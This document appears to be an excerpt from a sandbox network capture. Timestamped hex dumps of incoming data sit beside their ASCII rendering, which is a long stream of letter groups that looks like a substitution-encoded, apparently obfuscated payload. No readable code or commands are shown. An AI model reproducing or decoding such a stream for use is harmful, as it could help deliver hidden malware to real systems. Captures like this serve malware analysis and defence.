                                                  2021-10-29 18:29:53 UTC1362INData Raw: 43 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4c 63 20 4e 4e 56 20 4e 4d 49 20 56 72 57 20 59 43 20 63 43 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 4e 72 20 59 43 20 4e 63 59 20 4e 56 57 20 4e 4e 72 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 56 20 4e 4e 72 20 4e 4d 72 20 4e 72 43 20 4e 4e 56 20 72 57 20 59 49 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 43 72 20 4e 4e 56 20 4e 43 49 20 72 57 20 59 43 20 59 72 20 72 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4c 20 4e 72 57 20 72 49 20 59 43 20 63 43 20 57 72 20 4e 43 57 20 4d 43 20 56 56 72 20 72 56 20 59 43 20 72 49 20 59 4e 20 4e 57 20 4e 4c 56 20 4e 63 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 63 20 4d 20 59 43 20 59 72 20 57 72
                                                  Data Ascii: C Yr Ir NNV NNM Lc NNV NMI VrW YC cC Ir NNr NNM NCW NNr YC NNr YC NcY NVW NNr NVM NCW NNV YC rI YC Yr IV NNr NMr NrC NNV rW YI YC Yr IY NCY cW NCr NNV NCI rW YC Yr r NNr NNM NVr L NrW rI YC cC Wr NCW MC VVr rV YC rI YN NW NLV NcY NNM NCW NNc Vc M YC Yr Wr
                                                  2021-10-29 18:29:53 UTC1366INData Raw: 72 20 4e 56 43 20 56 63 20 4e 49 49 20 4e 4e 56 20 59 43 20 59 49 20 59 56 20 72 4e 20 57 43 20 56 59 59 20 72 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 56 4e 20 56 56 63 20 56 72 59 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 63 57 20 4d 4e 20 59 43 20 72 49 20 59 63 20 63 57 20 4e 43 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4c 4e 20 56 56 4d 20 72 49 20 59 43 20 63 43 20 4c 57 20 56 4e 4c 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 59 4d 20 59 4c 20 4c 43 20 63 56 20 49 4e 20 56 59 56 20 49 57 20 4e 43 59 20 4e 4e 63 20 72 57 20 4e 20 72 49 20 72 57 20 4e 56 63 20 4e 4e 72 20 4e 4e 57 20 63 57 20 4e 63 56 20 59 43 20 72 49 20 59 63 20 59 49 20 63 63 20 4e 56 4d 20 4d 4d 20 4e 56 72 20 4e 4e 4c 20 59 43 20 72 49 20 59 49 20 63 4c 20 56 43 63 20 57 4d 20 4e 4e 4c 20 4e
                                                  Data Ascii: r NVC Vc NII NNV YC YI YV rN WC VYY rM NCW NNV YN VN VVc VrY Ir NNr NNL cW MN YC rI Yc cW NCI NNr NNM NCL LN VVM rI YC cC LW VNL NNM NCW NVV YM YL LC cV IN VYV IW NCY NNc rW N rI rW NVc NNr NNW cW NcV YC rI Yc YI cc NVM MM NVr NNL YC rI YI cL VCc WM NNL N
                                                  2021-10-29 18:29:53 UTC1370INData Raw: 43 20 49 63 20 4e 4e 4c 20 49 20 57 72 20 4e 4e 56 20 59 43 20 59 56 20 56 72 20 72 43 20 49 63 20 57 20 63 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 4e 63 20 59 56 20 49 4d 20 4e 59 20 63 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 72 72 20 59 56 20 72 4d 20 4d 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 4e 49 20 72 49 20 59 4c 20 72 4e 20 4d 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 72 63 20 72 49 20 4d 4d 20 57 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 4e 63 20 59 43 20 72 57 20 4d 59 20 57 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 72 72 20 59 43 20 4d 4c 20 4e 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4d 4e 20 49 56 20 72 49 20 59 4e 20 4d 57 20 4e 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4d 4e 20 4e 4e 43 20 72 49 20
                                                  Data Ascii: C Ic NNL I Wr NNV YC YV Vr rC Ic W cY NCW NNV Yr Vc Nc YV IM NY cY NCW NNV Yr Vc rr YV rM MN NNM NCW NNc Vr NI rI YL rN MN NNM NCW NNc Vr rc rI MM WI NNr NNM NCY WC Nc YC rW MY WI NNr NNM NCY WC rr YC ML N Ir NNr NNL MN IV rI YN MW N Ir NNr NNL MN NNC rI
                                                  2021-10-29 18:29:53 UTC1374INData Raw: 59 20 4e 4e 56 20 59 43 20 59 49 20 56 72 20 72 43 20 49 63 20 57 20 57 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 4e 63 20 59 56 20 49 4d 20 4e 59 20 57 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 72 72 20 59 56 20 72 4d 20 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 4e 49 20 72 49 20 59 4c 20 72 4e 20 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 72 63 20 72 49 20 4d 4d 20 72 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 4e 63 20 59 43 20 72 57 20 4d 59 20 72 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 72 72 20 59 43 20 56 63 20 49 72 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4d 4e 20 4e 4e 43 20 72 49 20 4d 59 20 4d 4d 20 59 72 20 49 72 20 4e 4e 49 20 57 59 20 4d 57 20 4e 4e 72 20 72 57 20 4d 4d 20 4d 4d 20 59 72 20 49 72 20
                                                  Data Ascii: Y NNV YC YI Vr rC Ic W W NCW NNV Yr Vc Nc YV IM NY W NCW NNV Yr Vc rr YV rM NY NNM NCW NNc Vr NI rI YL rN NY NNM NCW NNc Vr rc rI MM rV NNr NNM NCY WC Nc YC rW MY rV NNr NNM NCY WC rr YC Vc Ir Ir NNr NVM MN NNC rI MY MM Yr Ir NNI WY MW NNr rW MM MM Yr Ir
                                                  2021-10-29 18:29:53 UTC1378INData Raw: 49 72 20 4e 56 43 20 4e 63 57 20 4e 4d 57 20 4e 4e 59 20 56 43 20 56 4c 49 20 59 43 20 4c 63 20 49 63 20 57 43 20 56 4e 59 20 4e 43 49 20 4e 4e 56 20 59 63 20 4e 43 20 4e 56 43 20 56 43 4e 20 4e 4d 4e 20 4e 72 4e 20 4e 4d 4e 20 57 57 20 57 49 20 72 49 20 56 43 63 20 4c 63 20 4e 4e 72 20 49 72 20 4e 4e 72 20 4e 4e 43 20 56 20 4e 56 4c 20 59 43 20 72 49 20 59 63 20 56 4c 72 20 49 63 20 4e 20 56 4c 49 20 4e 43 49 20 4e 4e 56 20 59 56 20 4c 59 20 59 49 20 4c 57 20 57 56 20 57 43 20 57 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 59 20 57 4c 20 4e 4d 4d 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 20 43 20 59 43 20 72 49 20 59 63 20 49 57 20 56 72 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 4d 20 59 49 20 72 4d 20 56 43 20 4e 49 4d 20 4e 72 20 4e 4e 72 20 4e 4e 4d 20 4e
                                                  Data Ascii: Ir NVC NcW NMW NNY VC VLI YC Lc Ic WC VNY NCI NNV Yc NC NVC VCN NMN NrN NMN WW WI rI VCc Lc NNr Ir NNr NNC V NVL YC rI Yc VLr Ic N VLI NCI NNV YV LY YI LW WV WC W NCW NNV Yc YY WL NMM Ir NNr NVM V C YC rI Yc IW Vrc NNY NNM NCM WM YI rM VC NIM Nr NNr NNM N
                                                  2021-10-29 18:29:53 UTC1381INData Raw: 43 20 4c 43 20 59 72 20 4e 4c 43 20 4d 49 20 4e 4e 63 20 4e 4e 4d 20 4d 4d 20 4e 4e 63 20 4e 4c 72 20 72 56 20 56 57 20 59 72 20 72 4c 20 4d 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 59 43 20 56 72 4d 20 56 57 20 63 49 20 4e 56 43 20 4e 4e 63 20 4e 4e 4d 20 4d 43 20 49 56 20 63 72 20 56 49 20 59 56 20 59 72 20 4e 4c 72 20 4e 4e 4c 20 4d 20 63 59 20 4e 4e 49 20 59 43 20 4e 72 43 20 59 56 20 63 49 20 4e 56 43 20 4e 4e 63 20 4e 4e 4d 20 56 4c 4c 20 49 59 20 4e 72 59 20 59 20 63 43 20 59 72 20 56 56 49 20 63 4d 20 4e 72 4d 20 4d 43 20 4e 4e 49 20 59 43 20 56 43 43 20 4e 20 4d 63 20 4e 4e 43 20 4e 4e 63 20 4e 4e 4d 20 56 72 4d 20 49 43 20 63 72 20 56 49 20 63 43 20 59 72 20 4e 49 63 20 4e 43 57 20 4e 72 4d 20 4d 43 20 4e 4e 49 20 59 43 20 4e 59 59 20 56 20 4e
                                                  Data Ascii: C LC Yr NLC MI NNc NNM MM NNc NLr rV VW Yr rL MC NNM NCW NNI YC VrM VW cI NVC NNc NNM MC IV cr VI YV Yr NLr NNL M cY NNI YC NrC YV cI NVC NNc NNM VLL IY NrY Y cC Yr VVI cM NrM MC NNI YC VCC N Mc NNC NNc NNM VrM IC cr VI cC Yr NIc NCW NrM MC NNI YC NYY V N
                                                  2021-10-29 18:29:53 UTC1386INData Raw: 56 72 20 4e 43 57 20 56 4c 20 59 43 20 72 57 20 59 4e 20 59 72 20 49 72 20 4e 57 4e 20 4d 4c 20 4e 43 57 20 4e 4e 56 20 57 59 20 72 49 20 59 57 20 59 72 20 56 4e 4c 20 4e 4e 72 20 56 72 72 20 4e 43 57 20 57 63 20 59 43 20 4e 49 59 20 4e 4d 20 59 72 20 49 72 20 57 4e 20 4e 4e 4d 20 4e 43 43 20 4e 4e 56 20 4e 49 4c 20 72 49 20 4e 4d 57 20 59 59 20 63 49 20 4e 4e 72 20 63 63 20 72 63 20 4e 4e 56 20 59 43 20 56 59 20 59 43 20 63 4e 20 49 72 20 56 72 57 20 4e 4e 4d 20 56 4c 63 20 4e 4e 4c 20 4c 72 20 72 49 20 4e 57 43 20 4d 20 49 72 20 4e 4e 72 20 57 56 20 4e 43 57 20 4e 56 4c 20 59 43 20 4e 49 49 20 59 43 20 4e 49 4c 20 49 59 20 57 49 20 4e 4e 4d 20 4e 49 59 20 49 49 20 59 43 20 72 49 20 56 4d 20 59 72 20 57 59 20 4e 4e 72 20 56 72 49 20 4e 43 57 20 56 72 4e
                                                  Data Ascii: Vr NCW VL YC rW YN Yr Ir NWN ML NCW NNV WY rI YW Yr VNL NNr Vrr NCW Wc YC NIY NM Yr Ir WN NNM NCC NNV NIL rI NMW YY cI NNr cc rc NNV YC VY YC cN Ir VrW NNM VLc NNL Lr rI NWC M Ir NNr WV NCW NVL YC NII YC NIL IY WI NNM NIY II YC rI VM Yr WY NNr VrI NCW VrN
                                                  2021-10-29 18:29:53 UTC1390INData Raw: 4c 4c 20 72 57 20 59 43 20 59 72 20 4e 43 20 4e 56 4c 20 4e 4e 4d 20 4e 43 57 20 72 4e 20 59 4e 20 56 43 20 59 4e 20 4e 57 20 49 63 20 57 4d 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 4d 4e 20 63 4c 20 59 43 20 59 72 20 4e 4c 20 4e 4e 59 20 49 4e 20 4e 43 49 20 49 59 20 72 49 20 4c 59 20 59 4e 20 59 72 20 49 72 20 56 72 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 43 4d 20 72 57 20 56 56 20 59 59 20 4e 4e 4c 20 4e 4e 56 20 4e 43 56 20 4e 43 49 20 4e 4e 56 20 59 43 20 59 4c 20 59 59 20 59 72 20 49 72 20 72 4c 20 4e 4e 63 20 4d 4c 20 4e 4e 4c 20 56 4c 20 59 43 20 4c 4c 20 59 59 20 49 72 20 4e 4e 72 20 56 4c 4e 20 57 49 20 4e 4e 56 20 59 43 20 4e 43 59 20 59 4e 20 4e 49 20 49 59 20 49 4d 20 4e 4e 57 20 4e 56 63 20 4e 4e 4c 20 59 43 20 72 49 20 56 72 56 20 59 72
                                                  Data Ascii: LL rW YC Yr NC NVL NNM NCW rN YN VC YN NW Ic WM NNc NCW NNV MN cL YC Yr NL NNY IN NCI IY rI LY YN Yr Ir Vrc NNM NCW NNV NCM rW VV YY NNL NNV NCV NCI NNV YC YL YY Yr Ir rL NNc ML NNL VL YC LL YY Ir NNr VLN WI NNV YC NCY YN NI IY IM NNW NVc NNL YC rI VrV Yr
                                                  2021-10-29 18:29:53 UTC1394INData Raw: 57 20 4e 4e 4c 20 59 43 20 72 72 20 72 63 20 4e 72 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 72 56 20 4e 43 49 20 59 56 20 4c 4c 20 59 4e 20 59 72 20 72 59 20 4e 4e 4e 20 4e 43 20 4e 56 72 20 4e 4e 4c 20 59 43 20 4e 63 4c 20 72 4d 20 4e 72 72 20 49 72 20 63 59 20 4e 4e 63 20 56 56 56 20 4e 56 63 20 4e 49 56 20 4c 4c 20 4e 20 59 59 20 4e 56 20 57 49 20 56 59 56 20 4e 56 72 20 63 4d 20 59 4e 20 63 72 20 4c 49 20 4e 4d 49 20 63 57 20 63 59 20 4e 4e 63 20 4e 4e 43 20 4e 4e 57 20 4e 49 49 20 4c 4c 20 4e 20 59 59 20 4e 4d 72 20 4e 56 4d 20 56 4c 43 20 4e 56 72 20 63 4d 20 59 4e 20 4e 57 63 20 59 63 20 4e 4d 72 20 63 57 20 63 59 20 4e 4e 63 20 56 4c 4e 20 4e 56 63 20 4e 4d 59 20 4c 4c 20 4e 20 59 59 20 56 4e 4c 20 57 49 20 56 4e 59 20 4e 56 72 20 63 4d 20 59 4e 20
                                                  Data Ascii: W NNL YC rr rc Nrr Ir NNY NNM rV NCI YV LL YN Yr rY NNN NC NVr NNL YC NcL rM Nrr Ir cY NNc VVV NVc NIV LL N YY NV WI VYV NVr cM YN cr LI NMI cW cY NNc NNC NNW NII LL N YY NMr NVM VLC NVr cM YN NWc Yc NMr cW cY NNc VLN NVc NMY LL N YY VNL WI VNY NVr cM YN
                                                  2021-10-29 18:29:53 UTC1398INData Raw: 4e 4d 49 20 4e 4e 59 20 4e 49 72 20 4d 49 20 4e 4e 4c 20 59 43 20 63 20 59 43 20 49 56 20 4e 43 57 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 63 72 20 72 49 20 4e 57 4c 20 57 20 4e 49 43 20 57 4d 20 63 4d 20 4e 43 57 20 4e 57 56 20 4e 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 56 56 4d 20 4e 4e 4d 20 4e 59 49 20 4d 57 20 56 4e 4c 20 4c 59 20 4e 43 20 59 72 20 4e 56 20 4d 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 4d 4d 20 59 43 20 4e 43 4d 20 4e 43 59 20 4e 4c 43 20 4e 43 56 20 49 4d 20 4e 4e 56 20 4e 72 20 4e 4e 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 72 20 4e 43 57 20 4e 57 4d 20 56 4e 20 56 43 4d 20 4c 4c 20 57 20 49 72 20 4e 72 20 4d 49 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 4d 57 20 59 72 20 4e 4d 72 20 63 4d 20
                                                  Data Ascii: NMI NNY NIr MI NNL YC c YC IV NCW NNr NNM NCW NNV Ncr rI NWL W NIC WM cM NCW NWV NN rI YC Yr Ir VVM NNM NYI MW VNL LY NC Yr NV MV NNM NCW NNV YC NMM YC NCM NCY NLC NCV IM NNV Nr NN YC Yr Ir NNr Vrr NCW NWM VN VCM LL W Ir Nr MI NCW NNV YC rI NMW Yr NMr cM
                                                  2021-10-29 18:29:53 UTC1402INData Raw: 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 59 4e 20 4e 4e 56 20 4e 43 49 20 72 63 20 56 56 4c 20 4c 72 20 4e 72 4c 20 4e 4e 72 20 4e 43 59 20 59 4c 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 63 43 20 49 72 20 4e 56 57 20 4e 4e 59 20 4e 56 49 20 4e 43 43 20 56 4c 63 20 72 49 20 49 20 4e 4e 43 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 56 4c 43 20 59 43 20 72 4d 20 4c 20 56 4e 57 20 63 72 20 4e 72 4d 20 4e 4e 4d 20 4c 4c 20 72 43 20 59 43 20 72 49 20 59 43 20 59 72 20 4e 57 72 20 4e 4e 72 20 57 20 72 72 20 4e 59 4d 20 4c 49 20 56 4e 56 20 59 43 20 4e 43 72 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 63 72 20 72 49 20 4e 4e 43 20 72 57 20 4e 49 59 20 4e 43 56 20 4e 72 63 20 4e 43 57 20 72 20 4e 43 63 20 72 49 20 59 43 20 59
                                                  Data Ascii: c Yr Ir NNr NNM VYN NNV NCI rc VVL Lr NrL NNr NCY YL NNV YC rI YC NcC Ir NVW NNY NVI NCC VLc rI I NNC Ir NNr NNM NCW VLC YC rM L VNW cr NrM NNM LL rC YC rI YC Yr NWr NNr W rr NYM LI VNV YC NCr NV NNr NNM NCW NNV Ncr rI NNC rW NIY NCV Nrc NCW r NCc rI YC Y
                                                  2021-10-29 18:29:53 UTC1406INData Raw: 20 59 43 20 4e 72 57 20 4e 43 72 20 4e 56 72 20 57 57 20 4c 4c 20 4e 4e 4c 20 59 43 20 4e 49 4c 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 56 4d 20 4e 43 57 20 4e 72 57 20 56 72 20 4c 49 20 4c 63 20 4e 56 43 20 49 59 20 56 72 4e 20 56 72 56 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 63 72 20 63 56 20 56 57 20 4e 43 4d 20 4e 43 72 20 4e 56 4c 20 63 4c 20 59 4e 20 4e 56 49 20 4e 49 4e 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 59 4e 20 4e 4e 56 20 57 63 20 72 4e 20 4e 4d 20 4c 56 20 56 4d 20 4e 4e 59 20 4e 4c 4c 20 56 4c 72 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 63 43 20 49 72 20 72 4e 20 4e 43 49 20 4e 49 43 20 4e 56 59 20 57 49 20 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 59 20 4e 43 57 20 56 56 59 20 4e 49 20 56 56 56 20 49
                                                  Data Ascii: YC NrW NCr NVr WW LL NNL YC NIL YC Yr Ir NNr VVM NCW NrW Vr LI Lc NVC IY VrN VrV NCW NNV YC rI Ncr cV VW NCM NCr NVL cL YN NVI NIN Yr Ir NNr NNM VYN NNV Wc rN NM LV VM NNY NLL VLr NNV YC rI YC NcC Ir rN NCI NIC NVY WI rW YC Yr Ir NNr VrY NCW VVY NI VVV I
                                                  2021-10-29 18:29:53 UTC1410INData Raw: 20 4e 4d 72 20 56 43 57 20 59 43 20 72 49 20 59 43 20 59 72 20 56 4e 43 20 4e 56 56 20 4e 4d 59 20 4e 43 4d 20 57 63 20 59 43 20 4e 49 4d 20 59 4e 20 56 59 43 20 56 72 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 49 43 20 59 63 20 4e 4c 59 20 63 56 20 56 56 57 20 4e 43 43 20 56 72 57 20 4e 43 49 20 4e 63 72 20 4e 72 4d 20 72 49 20 59 43 20 59 72 20 49 72 20 56 72 72 20 4e 56 59 20 56 43 49 20 4e 56 43 20 4e 4c 4d 20 4c 49 20 4e 57 43 20 59 59 20 4e 4c 4d 20 56 4e 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 56 20 59 49 20 4e 43 20 57 59 20 4e 49 43 20 57 57 20 56 56 72 20 4e 4e 4c 20 56 4e 59 20 4e 72 59 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 4c 20 4e 43 4e 20 59 56 20 59 4d 20 56 56 72 20 4c 63 20 4e 49 4d 20 49 59 20 4e
                                                  Data Ascii: NMr VCW YC rI YC Yr VNC NVV NMY NCM Wc YC NIM YN VYC VrY NNr NNM NCW NNV NIC Yc NLY cV VVW NCC VrW NCI Ncr NrM rI YC Yr Ir Vrr NVY VCI NVC NLM LI NWC YY NLM VNN NNM NCW NNV YC NIV YI NC WY NIC WW VVr NNL VNY NrY YC Yr Ir NNr VrL NCN YV YM VVr Lc NIM IY N
                                                  2021-10-29 18:29:53 UTC1413INData Raw: 63 20 56 56 4e 20 56 4e 4c 20 59 43 20 72 49 20 59 43 20 59 72 20 56 4e 43 20 4e 56 56 20 4e 49 49 20 4e 56 72 20 4e 43 4d 20 59 43 20 4e 59 63 20 59 4e 20 4e 72 56 20 56 72 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 49 43 20 59 63 20 56 56 4d 20 4c 57 20 56 57 20 4e 4e 57 20 56 4e 4d 20 4e 43 49 20 4e 4d 4d 20 4e 59 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 56 72 72 20 4e 56 59 20 4e 4e 59 20 4e 4e 56 20 4e 4d 4c 20 4c 4d 20 4e 59 57 20 59 59 20 4e 59 4d 20 56 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 56 20 59 49 20 4e 4d 20 49 72 20 56 4e 4c 20 57 63 20 4e 57 56 20 4e 4e 4c 20 56 56 72 20 4e 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 4c 20 4e 43 4e 20 4e 43 63 20 72 57 20 4e 4d 59 20 4c 57 20 4e 59 56 20 49 59
                                                  Data Ascii: c VVN VNL YC rI YC Yr VNC NVV NII NVr NCM YC NYc YN NrV VrN NNr NNM NCW NNV NIC Yc VVM LW VW NNW VNM NCI NMM NYN rI YC Yr Ir Vrr NVY NNY NNV NML LM NYW YY NYM VNY NNM NCW NNV YC NIV YI NM Ir VNL Wc NWV NNL VVr NrW YC Yr Ir NNr VrL NCN NCc rW NMY LW NYV IY
                                                  2021-10-29 18:29:53 UTC1418INData Raw: 20 59 59 20 4d 49 20 56 4e 57 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 56 20 59 49 20 4e 4c 57 20 57 56 20 57 49 20 4e 4e 4d 20 4e 57 43 20 4e 4e 4c 20 4e 4d 20 4e 59 4c 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 4c 20 4e 43 4e 20 4d 63 20 59 4d 20 56 72 57 20 59 43 20 56 56 63 20 49 59 20 49 57 20 56 56 43 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 49 43 20 63 56 20 4e 63 20 4e 56 4e 20 4e 43 4e 20 4e 43 57 20 4e 63 72 20 59 4e 20 72 20 4e 59 59 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 4c 59 20 4e 56 43 20 56 4c 59 20 63 43 20 56 59 4e 20 59 72 20 4e 56 57 20 4e 4e 59 20 4d 4c 20 4e 57 63 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 4d 63 20 57 56 20 4e 72 4d 20 4e 56 4e 20 4e 56 59 20 4e 4e 56 20 56 4c 4e 20 72 57 20 4e 4e
                                                  Data Ascii: YY MI VNW NNM NCW NNV YC NIV YI NLW WV WI NNM NWC NNL NM NYL YC Yr Ir NNr VrL NCN Mc YM VrW YC VVc IY IW VVC NCW NNV YC rI NIC cV Nc NVN NCN NCW Ncr YN r NYY Yr Ir NNr NNM VLY NVC VLY cC VYN Yr NVW NNY ML NWc NNV YC rI YC NMc WV NrM NVN NVY NNV VLN rW NN
                                                  2021-10-29 18:29:53 UTC1422INData Raw: 43 49 20 59 43 20 4d 59 20 4e 59 4d 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 56 72 4c 20 59 43 20 57 49 20 72 49 20 56 56 4e 20 63 4d 20 72 59 20 4e 4e 57 20 56 4c 63 20 56 4e 57 20 59 43 20 72 49 20 59 43 20 59 72 20 56 4e 43 20 4e 43 63 20 56 59 59 20 49 57 20 4e 4e 4d 20 59 43 20 49 43 20 72 49 20 4e 59 43 20 56 59 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 56 4e 4e 20 72 57 20 4e 4c 63 20 56 4e 20 49 59 20 4e 4e 72 20 56 43 20 4e 4e 4e 20 56 4e 56 20 4e 59 4c 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 72 4d 20 4e 4e 63 20 4e 63 59 20 72 49 20 72 4e 20 72 49 20 49 4c 20 59 56 20 72 20 56 56 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 43 57 20 59 57 20 4c 4c 20 4e 43 4d 20 56 43 4c 20 4e 43 57 20 4e 56 20 4e 4e 72 20 4e 43 63
                                                  Data Ascii: CI YC MY NYM Ir NNr NNM NCW VrL YC WI rI VVN cM rY NNW VLc VNW YC rI YC Yr VNC NCc VYY IW NNM YC IC rI NYC VYY NNr NNM NCW NNV VNN rW NLc VN IY NNr VC NNN VNV NYL rI YC Yr Ir NrM NNc NcY rI rN rI IL YV r VVL NNM NCW NNV YC VCW YW LL NCM VCL NCW NV NNr NCc
                                                  2021-10-29 18:29:53 UTC1426INData Raw: 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63
                                                  Data Ascii: r Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc
                                                  2021-10-29 18:29:53 UTC1430INData Raw: 20 56 59 4e 20 57 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4e 59 57 20 56 4d 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 4e 57 72 20 49 57 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 57 63 20 56 4e 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 63 4e 20 49 4d 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 57 63 20 56 4e 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 59 4c 20 49 57 20 59 43 20 72 49 20 72 49 20 59 72 20 56 4e 57 20 57 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 57 63 20 56 4e 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 63 4e 20 49 4d 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c
                                                  Data Ascii: VYN WN NNM NCW NNL YC NYW VM Yr Ir NNY NNM NWr IW YC rI YN Yr r IY NNM NCW NNL YC Wc VN Yr Ir NNY NNM cN IM YC rI YN Yr r IY NNM NCW NNL YC Wc VN Yr Ir NNY NNM YL IW YC rI rI Yr VNW WN NNM NCW NNL YC Wc VN Yr Ir NNY NNM cN IM YC rI YN Yr r IY NNM NCW NNL
